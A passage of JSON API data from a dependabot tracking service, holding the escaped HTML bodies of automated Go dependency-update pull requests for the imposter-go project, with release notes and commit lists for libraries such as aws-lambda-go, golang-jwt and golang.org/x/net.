href=\"https://redirect.github.com/aws/aws-lambda-go/pull/608\"\u003eaws/aws-lambda-go#608\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\"\u003ehttps://github.com/aws/aws-lambda-go/compare/v1.51.0...v1.51.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.51.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ca19f6ff85c6e7e87430d86d98d64a2d461dbabf\"\u003e\u003ccode\u003eca19f6f\u003c/code\u003e\u003c/a\u003e Allow ClientContext.Custom unmarshaling for non-string (JSON) values (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/620\"\u003e#620\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9c32960087517ddf57e3d405fae5e8e5e730f4cc\"\u003e\u003ccode\u003e9c32960\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/619\"\u003e#619\u003c/a\u003e from maximrub/inbound-federation\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/ebe38d988fd6f254f2c818c1bd12e15df52577f3\"\u003e\u003ccode\u003eebe38d9\u003c/code\u003e\u003c/a\u003e add support for Cognito Inbound federation Lambda trigger\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/71624ac50ffdcb73bce436c791caadfb468a8abc\"\u003e\u003ccode\u003e71624ac\u003c/code\u003e\u003c/a\u003e Fix spelling typos (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/616\"\u003e#616\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/33e4dc3007f6898e4031ac3b04520a21c0a4fb8c\"\u003e\u003ccode\u003e33e4dc3\u003c/code\u003e\u003c/a\u003e Update workflows for go 1.26 (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/617\"\u003e#617\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/e1cb4611fc8ef22a40196b19651a33487b846a01\"\u003e\u003ccode\u003ee1cb461\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/612\"\u003e#612\u003c/a\u003e from yhamano0312/feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/a66ce2dc84f235c83f927524f218a106aa3f0c93\"\u003e\u003ccode\u003ea66ce2d\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into feat/add-s3-event-fields\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/9dac8a59d3d97d63314ac5ffc7d12475eaa0a76a\"\u003e\u003ccode\u003e9dac8a5\u003c/code\u003e\u003c/a\u003e Add structured logging helper (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/614\"\u003e#614\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/6252f73f51494b482a1ff1b21b84bb764add35b2\"\u003e\u003ccode\u003e6252f73\u003c/code\u003e\u003c/a\u003e fix: always return PhysicalResourceID for CFn CustomResources (\u003ca href=\"https://redirect.github.com/aws/aws-lambda-go/issues/613\"\u003e#613\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-lambda-go/commit/be52e48b133401d28c9f19b746989c4f1458b816\"\u003e\u003ccode\u003ebe52e48\u003c/code\u003e\u003c/a\u003e feat: add lifecycle event data structure and corresponding test for S3 events\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-lambda-go/compare/v1.49.0...v1.54.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go` from 1.55.7 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.55.7...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `golang.org/x/net` from 0.42.0 to 0.50.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/ebddb99633e0fc35d135f62e9400678492c1d3be\"\u003e\u003ccode\u003eebddb99\u003c/code\u003e\u003c/a\u003e go.mod: update golang.org/x dependencies\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/4a490d4f5331699af2b0987af2e4cea9925f65af\"\u003e\u003ccode\u003e4a490d4\u003c/code\u003e\u003c/a\u003e internal/http3: add Expect: 100-continue support to ClientConn\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/73fe7011adb0a690693f0318325c60d477c7bb3a\"\u003e\u003ccode\u003e73fe701\u003c/code\u003e\u003c/a\u003e internal/http3: add Expect: 100-continue support to Server\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/af0c9df79dbe35108ead105e4ca28133551e4d1a\"\u003e\u003ccode\u003eaf0c9df\u003c/code\u003e\u003c/a\u003e html: add NodeType.String() method\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/e02fb33933734f5c17f8474ef9f54461e776d119\"\u003e\u003ccode\u003ee02fb33\u003c/code\u003e\u003c/a\u003e internal/http3: make responseWriter.Flush write headers if not done yet\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/da558ff100e05eb3fd3c94d2f978c062edc070a2\"\u003e\u003ccode\u003eda558ff\u003c/code\u003e\u003c/a\u003e internal/http3: ensure bodyReader cannot be read after being closed\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/d7c76faf077586c8657a8bdd404484c090764e2b\"\u003e\u003ccode\u003ed7c76fa\u003c/code\u003e\u003c/a\u003e internal/http3: make responseWriter behave closer to other http.ResponseWriter\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/64b3af9625ad94ce3f68ac1ab80733f691a49319\"\u003e\u003ccode\u003e64b3af9\u003c/code\u003e\u003c/a\u003e http2: prevent transport deadlock due to WINDOW_UPDATE that exceeds limit\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/1973e8da2d578cd964f4c1df41ed8c553f1e17b7\"\u003e\u003ccode\u003e1973e8d\u003c/code\u003e\u003c/a\u003e internal/http3: add Server support for handling HEAD requests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang/net/commit/57ea86db083ff804aa7dfca3489c0f965ab3b0da\"\u003e\u003ccode\u003e57ea86d\u003c/code\u003e\u003c/a\u003e icmp, internal/socket, ipv4, ipv6: use binary.NativeEndian\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang/net/compare/v0.42.0...v0.50.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e","html_url":"https://github.com/imposter-project/imposter-go/pull/58","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/imposter-project%2Fimposter-go/issues/58","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/58/packages"}},{"old_version":"1.55.7","new_version":"1.55.8","update_type":"patch","path":null,"pr_created_at":"2026-04-05T00:31:33.000Z","version_change":"1.55.7 → 1.55.8","issue":{"uuid":"4206092544","node_id":"PR_kwDONfDiq87QAFpU","number":53,"state":"closed","title":"build(deps): bump the go-minor-and-patch group across 1 directory with 9 updates","user":"dependabot[bot]","labels":["dependencies","go"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-04-05T19:19:42.000Z","author_association":null,"state_reason":null,"created_at":"2026-04-05T00:31:33.000Z","updated_at":"2026-04-05T19:19:44.000Z","time_to_close":67689,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"build(deps): bump","group_name":"go-minor-and-patch","update_count":9,"packages":[{"name":"github.com/brianvoe/gofakeit/v7","old_version":"7.14.0","new_version":"7.14.1","repository_url":"https://github.com/brianvoe/gofakeit"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.3.0","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/hashicorp/go-plugin","old_version":"1.6.3","new_version":"1.7.0","repository_url":"https://github.com/hashicorp/go-plugin"},{"name":"github.com/pb33f/libopenapi","old_version":"0.22.3","new_version":"0.35.1","repository_url":"https://github.com/pb33f/libopenapi"},{"name":"github.com/pb33f/libopenapi-validator","old_version":"0.4.7","new_version":"0.13.3","repository_url":"https://github.com/pb33f/libopenapi-validator"},{"name":"github.com/aws/aws-lambda-go","old_version":"1.49.0","new_version":"1.54.0","repository_url":"https://github.com/aws/aws-lambda-go"},{"name":"github.com/aws/aws-sdk-go","old_version":"1.55.7","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"}],"path":null,"ecosystem":"go"},"body":"Bumps the go-minor-and-patch group with 7 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/brianvoe/gofakeit/v7](https://github.com/brianvoe/gofakeit) | `7.14.0` | `7.14.1` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.3.0` | `5.3.1` |\n| [github.com/hashicorp/go-plugin](https://github.com/hashicorp/go-plugin) | `1.6.3` | `1.7.0` |\n| [github.com/pb33f/libopenapi](https://github.com/pb33f/libopenapi) | `0.22.3` | `0.35.1` |\n| [github.com/pb33f/libopenapi-validator](https://github.com/pb33f/libopenapi-validator) | `0.4.7` | `0.13.3` |\n| [github.com/aws/aws-lambda-go](https://github.com/aws/aws-lambda-go) | `1.49.0` | `1.54.0` |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.55.7` | `1.55.8` |\n\n\nUpdates `github.com/brianvoe/gofakeit/v7` from 7.14.0 to 7.14.1\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/ee08eae8003a40768c47bacd76dfa5503a461752\"\u003e\u003ccode\u003eee08eae\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/brianvoe/gofakeit/issues/392\"\u003e#392\u003c/a\u003e from shubhamatkal/fix/password-guarantee-character-sets\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/c38fe1a8fb22e850fbdbbe2a54d5954a60e13a65\"\u003e\u003ccode\u003ec38fe1a\u003c/code\u003e\u003c/a\u003e github - workflow less verbose\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/22b91127ddcc896b66a389c2c00b73985091d11c\"\u003e\u003ccode\u003e22b9112\u003c/code\u003e\u003c/a\u003e datetime - yearly fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/brianvoe/gofakeit/commit/35520064411e85a403d4b41f22d3269604871e20\"\u003e\u003ccode\u003e3552006\u003c/code\u003e\u003c/a\u003e fix: guarantee at least one char per enabled set in Password()\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/brianvoe/gofakeit/compare/v7.14.0...v7.14.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/golang-jwt/jwt/v5` from 5.3.0 to 5.3.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/golang-jwt/jwt/releases\"\u003egithub.com/golang-jwt/jwt/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.3.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003e🔐 Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd spellcheck Github action to catch common spelling mistakes by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/458\"\u003egolang-jwt/jwt#458\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eWithNotBeforeRequired\u003c/code\u003e parser option and add test coverage by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/456\"\u003egolang-jwt/jwt#456\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate godoc example func to properly refer to \u003ccode\u003eNewWithClaims()\u003c/code\u003e by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/459\"\u003egolang-jwt/jwt#459\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate github workflows by \u003ca href=\"https://github.com/mfridman\"\u003e\u003ccode\u003e@​mfridman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/462\"\u003egolang-jwt/jwt#462\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdditional test for CustomClaims that validates unmarshalling behaviour by \u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/457\"\u003egolang-jwt/jwt#457\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix early file close in jwt cli by \u003ca href=\"https://github.com/mfridman\"\u003e\u003ccode\u003e@​mfridman\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/472\"\u003egolang-jwt/jwt#472\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdd TPM signature reference by \u003ca href=\"https://github.com/salrashid123\"\u003e\u003ccode\u003e@​salrashid123\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/473\"\u003egolang-jwt/jwt#473\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRemove misleading ParserOptions documentation in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/484\"\u003egolang-jwt/jwt#484\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSave signature to Token struct after successful signing by \u003ca href=\"https://github.com/EgorSheff\"\u003e\u003ccode\u003e@​EgorSheff\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/417\"\u003egolang-jwt/jwt#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSet token.Signature in \u003ccode\u003eParseUnverified\u003c/code\u003e by \u003ca href=\"https://github.com/slickwilli\"\u003e\u003ccode\u003e@​slickwilli\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/414\"\u003egolang-jwt/jwt#414\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e👒 Dependencies\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBump crate-ci/typos from 1.34.0 to 1.35.3 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/461\"\u003egolang-jwt/jwt#461\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.35.4 to 1.36.2 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/470\"\u003egolang-jwt/jwt#470\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github/codeql-action from 3 to 4 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/478\"\u003egolang-jwt/jwt#478\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.36.2 to 1.39.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/480\"\u003egolang-jwt/jwt#480\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golangci/golangci-lint-action from 8 to 9 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/481\"\u003egolang-jwt/jwt#481\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/469\"\u003egolang-jwt/jwt#469\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.39.0 to 1.40.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/488\"\u003egolang-jwt/jwt#488\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/487\"\u003egolang-jwt/jwt#487\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.40.0 to 1.41.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/490\"\u003egolang-jwt/jwt#490\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump crate-ci/typos from 1.41.0 to 1.42.1 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/492\"\u003egolang-jwt/jwt#492\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/equalsgibson\"\u003e\u003ccode\u003e@​equalsgibson\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/458\"\u003egolang-jwt/jwt#458\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/salrashid123\"\u003e\u003ccode\u003e@​salrashid123\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/473\"\u003egolang-jwt/jwt#473\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/EgorSheff\"\u003e\u003ccode\u003e@​EgorSheff\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/417\"\u003egolang-jwt/jwt#417\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/slickwilli\"\u003e\u003ccode\u003e@​slickwilli\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/golang-jwt/jwt/pull/414\"\u003egolang-jwt/jwt#414\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\"\u003ehttps://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/7ceae619e739dc8a7bf577214aa8ebf26668e9db\"\u003e\u003ccode\u003e7ceae61\u003c/code\u003e\u003c/a\u003e Add release.yml for changelog configuration\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/dce8e4dddcc9dc812cdc0b9d2037512d0e4b3eb5\"\u003e\u003ccode\u003edce8e4d\u003c/code\u003e\u003c/a\u003e Set token.Signature in \u003ccode\u003eParseUnverified\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/414\"\u003e#414\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/8889e208aa5c3736e5f7a856107ee70c046b803e\"\u003e\u003ccode\u003e8889e20\u003c/code\u003e\u003c/a\u003e Save signature to Token struct after successful signing (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/417\"\u003e#417\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/d237f8204b397bc008b5b07c4e081beb4ec2a7b1\"\u003e\u003ccode\u003ed237f82\u003c/code\u003e\u003c/a\u003e ci: update github-actions schedule interval to monthly\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/d8dce95a406fc435aa3d11c5073f2f31a9449116\"\u003e\u003ccode\u003ed8dce95\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.41.0 to 1.42.1 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/492\"\u003e#492\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/e93180329eab078116176ff7dc4352760bc5f290\"\u003e\u003ccode\u003ee931803\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.40.0 to 1.41.0 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/490\"\u003e#490\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/e6a0afa839d74787501369217245b52bfc75f30d\"\u003e\u003ccode\u003ee6a0afa\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 5 to 6 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/487\"\u003e#487\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/9f85c9ec9f10fb6919d773cb8df07029639ec76e\"\u003e\u003ccode\u003e9f85c9e\u003c/code\u003e\u003c/a\u003e Bump crate-ci/typos from 1.39.0 to 1.40.0 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/488\"\u003e#488\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/60a8669e0221aed55a6abfd9b5cd20472f0c6ebd\"\u003e\u003ccode\u003e60a8669\u003c/code\u003e\u003c/a\u003e Bump actions/setup-go from 5 to 6 (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/469\"\u003e#469\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/golang-jwt/jwt/commit/76f582896da76978896d59ced995d7967c33c434\"\u003e\u003ccode\u003e76f5828\u003c/code\u003e\u003c/a\u003e Remove misleading ParserOptions documentation (\u003ca href=\"https://redirect.github.com/golang-jwt/jwt/issues/484\"\u003e#484\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/golang-jwt/jwt/compare/v5.3.0...v5.3.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/hashicorp/go-plugin` from 1.6.3 to 1.7.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/hashicorp/go-plugin/releases\"\u003egithub.com/hashicorp/go-plugin's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.7.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ePrint panic output on Error log level by \u003ca href=\"https://github.com/hanzei\"\u003e\u003ccode\u003e@​hanzei\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/292\"\u003ehashicorp/go-plugin#292\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSpend less time preparing to write log lines when the logger is disabled by \u003ca href=\"https://github.com/apparentlymart\"\u003e\u003ccode\u003e@​apparentlymart\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/352\"\u003ehashicorp/go-plugin#352\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eComplete the implementation of moving panics to the Error log level by \u003ca href=\"https://github.com/jbardin\"\u003e\u003ccode\u003e@​jbardin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/hashicorp/go-plugin/pull/353\"\u003ehashicorp/go-plugin#353\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eupdate changelog for v1.7.0 by \u003ca 